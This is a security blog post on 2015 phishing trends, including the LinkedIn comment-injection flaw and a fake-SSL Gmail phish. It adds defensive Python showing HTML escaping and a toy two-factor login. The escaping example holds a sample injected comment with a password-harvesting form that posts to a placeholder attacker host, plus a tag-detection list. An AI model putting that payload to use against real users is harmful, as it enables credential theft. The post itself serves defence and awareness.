According to a new report, the Infoblox DNS Threat Index (PDF), phishing is growing in a big way, increasing 74 percent in the second quarter of 2015. The numbers are based on the increase in domain creation and otherwise setting up infrastructure to stage phishing attacks.
As Tripwire.com stated, it’s much easier to rely on social engineering and exploiting weaknesses in the human psyche rather than undermining hardened security systems. That truth is what leads attackers to study social networking profiles and any information online that could lend them credibility during a phishing scam, whether via emails or phone calls.
Phishing Social Media via Emails
LinkedIn, the social networking site notorious for its deluge of daily emails, recently patched a major security issue that would have allowed attackers to run phishing campaigns via email. Kaspersky found that an attacker could inject a malicious comment into a user’s post thread; that comment was then delivered to the user’s email account inside a notification.
Or, they could just inject code to display a form and collect information entered by the victim, as seen in the screenshot from Kaspersky below:
They could also redirect victims via a link to a spoofed website that serves up malware to the user.
This is particularly worrisome for a social networking website built on business relationships and the trust between colleagues and others seeking job opportunities. The amount of time it took for the site to fix the problem is also disturbing: LinkedIn was notified in November and fixed its site only recently.
Kaspersky recommends being cautious of opening any links in emails, and warns against registering on social media networks with your corporate email account.
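The root cause in the LinkedIn case is user-supplied comment text reaching an HTML email body without escaping. The following is an added example, not code from the original post or from LinkedIn, that contrasts the defective pattern with the hardened one and builds the notification as a real MIME message. The comment text, the sender name and the attacker host are all constructed here for illustration.

```python
import html
from email.message import EmailMessage

# Constructed sample comment, modeled on the injection the post describes:
# a comment body containing a credential-harvesting form. The host is a placeholder.
INJECTED_COMMENT = (
    'Great post! <form action="https://attacker.example/collect">'
    '<input name="password" type="password"><input type="submit"></form>'
)


def render_notification_unsafe(author: str, comment: str) -> str:
    """Defective pattern: user-controlled strings concatenated straight into HTML.
    Anything the commenter typed (forms, links, scripts) is rendered by the mail client."""
    return f"<p><b>{author}</b> commented:</p><div>{comment}</div>"


def render_notification_safe(author: str, comment: str) -> str:
    """Hardened pattern: every user-controlled value is HTML-escaped before it is
    placed in the body, so markup in the comment is shown as literal text."""
    return (
        f"<p><b>{html.escape(author)}</b> commented:</p>"
        f"<div>{html.escape(comment)}</div>"
    )


def contains_active_markup(comment: str) -> bool:
    """Cheap pre-send check: flag comments that carry tags a notification should
    never need. Escaping is the real control; this is a signal for monitoring."""
    lowered = comment.lower()
    return any(tag in lowered for tag in ("<form", "<script", "<iframe", "<input"))


def build_email(author: str, comment: str, to_addr: str,
                renderer=render_notification_safe) -> EmailMessage:
    """Builds a multipart/alternative notification with a plain-text part and an
    HTML part produced by `renderer` (safe by default)."""
    msg = EmailMessage()
    msg["Subject"] = "New comment on your post"   # static subject: no header injection surface
    msg["To"] = to_addr
    msg.set_content(f"{author} commented: {comment}")   # text/plain part, never rendered as HTML
    msg.add_alternative(renderer(author, comment), subtype="html")
    return msg


def html_part(msg: EmailMessage) -> str:
    """Returns the decoded text/html body of a built message."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            return part.get_content()
    return ""


if __name__ == "__main__":
    print("unsafe:", render_notification_unsafe("Eve", INJECTED_COMMENT))
    print("safe:  ", render_notification_safe("Eve", INJECTED_COMMENT))
    print("flagged:", contains_active_markup(INJECTED_COMMENT))
```

The unsafe renderer emits the `<form>` intact, so a mail client that renders HTML shows a working login box inside a message that genuinely came from the platform. The safe renderer turns the same input into `&lt;form ...&gt;`, which the reader sees as text. Escaping at the point of output, rather than trying to blacklist tags, is the control that closes the class of bug.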
Faking Trusted SSL Encryption for a Phish
Yet another recent phishing campaign involves attackers who have figured out how to fake Google’s trusted SSL encryption in order to send what appears to be a legitimate Gmail message redirecting users to a spoofed Google Drive page in an attempt to steal their username and password.
Researchers from Elastica, a cloud-access security company, found that after submitting information into the HTML page, they were redirected to a PDF document, instead of a page hosted on the Google server.
The attack is considered impressive as the attackers have even replicated the browser lock and https domain URL, standard trademarks of SSL encrypted pages, according to the International Business Times. And that’s pretty alarming, as many users have been trained to look for those indicators in order to trust the site before entering their credentials.
One guy on Twitter supports the use of multi-factor authentication to protect against password theft:
The password is dead. Long live multi factor auth! http://t.co/qILRyKPgwa — Tom Blauvelt (@TomBlue01) July 30, 2015
Phishing After a Breach
The U.S. Census Bureau is also concerned about phishing, after an attacker compromised a database containing names, addresses, phone numbers, site usernames and more.
In response, the Census Bureau is now seeking contractors that provide phishing awareness training and services to protect its information systems and data from potential attacks. The RFP lists certain requirements, including:
- Provide customer support in the design of phishing campaigns
- Provide the ability to develop customized phishing campaigns
- Provide customizable awareness training
- Provide the ability to track user response and training effectiveness
- Provide coverage for a maximum of 50,000 users
- Provide support to develop agency-specific anti-phishing messages
Prevention + Phishing Awareness = Win
Phishing awareness is key for any organization, but knowledge is more powerful when paired with prevention. One way to secure against phishing attacks is by deploying two-factor authentication for all of your users’ logins to web-based and other company applications.
Even if a phishing attack successfully steals a user’s credentials, the attacker can’t get access to your systems without physical possession of the user’s personal authentication device. For example, an authentication mobile app can push an authentication request to your phone. Without your phone, an attacker can’t approve the request and log in.
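To make the point above concrete, here is an added example (not code from the original post or from any vendor) of a push-style second factor reduced to its essentials: the server keeps a per-device key provisioned at enrollment, sends a fresh challenge to that device after the password checks out, and accepts the login only when the device returns an HMAC over the challenge. The user names, passwords and key sizes are constructed for illustration; the phishing scenario is modeled as a caller who knows the password but holds no enrolled device.

```python
import hashlib
import hmac
import secrets


class AuthServer:
    """Minimal two-factor login flow: password first, device-approved push second."""

    def __init__(self):
        self.users = {}     # username -> {"salt", "pw_hash", "device_key"}
        self.pending = {}   # challenge id -> (username, nonce), consumed on first use

    @staticmethod
    def _hash(password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def enroll(self, username: str, password: str) -> bytes:
        """Registers the password and provisions a random key to the user's device."""
        salt = secrets.token_bytes(16)
        device_key = secrets.token_bytes(32)
        self.users[username] = {
            "salt": salt,
            "pw_hash": self._hash(password, salt),
            "device_key": device_key,
        }
        return device_key

    def first_factor(self, username: str, password: str):
        """Checks the password. On success, issues a one-time challenge that is
        pushed to the enrolled device (returned here to model that delivery)."""
        user = self.users.get(username)
        if user is None or not hmac.compare_digest(user["pw_hash"], self._hash(password, user["salt"])):
            return None
        nonce = secrets.token_bytes(32)
        challenge_id = secrets.token_hex(8)
        self.pending[challenge_id] = (username, nonce)
        return challenge_id, nonce

    def second_factor(self, challenge_id: str, response: bytes) -> bool:
        """Accepts the login only if `response` is the enrolled device's HMAC over
        the pending nonce. The challenge is removed so it cannot be replayed."""
        entry = self.pending.pop(challenge_id, None)
        if entry is None:
            return False
        username, nonce = entry
        expected = hmac.new(self.users[username]["device_key"], nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


class Phone:
    """The user's authenticator app: the only holder of the device key."""

    def __init__(self, device_key: bytes):
        self.device_key = device_key

    def approve(self, nonce: bytes) -> bytes:
        return hmac.new(self.device_key, nonce, hashlib.sha256).digest()


def login(server: AuthServer, username: str, password: str, phone: Phone = None) -> str:
    """Runs both factors and reports the outcome as a short status string."""
    step = server.first_factor(username, password)
    if step is None:
        return "bad password"
    challenge_id, nonce = step
    if phone is None:
        return "push pending, no device"          # the phished-password case
    return "ok" if server.second_factor(challenge_id, phone.approve(nonce)) else "denied"


if __name__ == "__main__":
    server = AuthServer()
    phone = Phone(server.enroll("alice", "correct horse battery staple"))
    print(login(server, "alice", "correct horse battery staple"))         # no device
    print(login(server, "alice", "correct horse battery staple", phone))  # approved
```

The property to notice is that the password alone moves the attacker only as far as a pending push; the server never releases a session until the holder of the device key answers a nonce it has never seen before. Because the challenge is consumed on first use, a captured approval cannot be replayed either, which is the reason push or challenge-response factors hold up better than static codes against a phishing page that simply relays what the victim types.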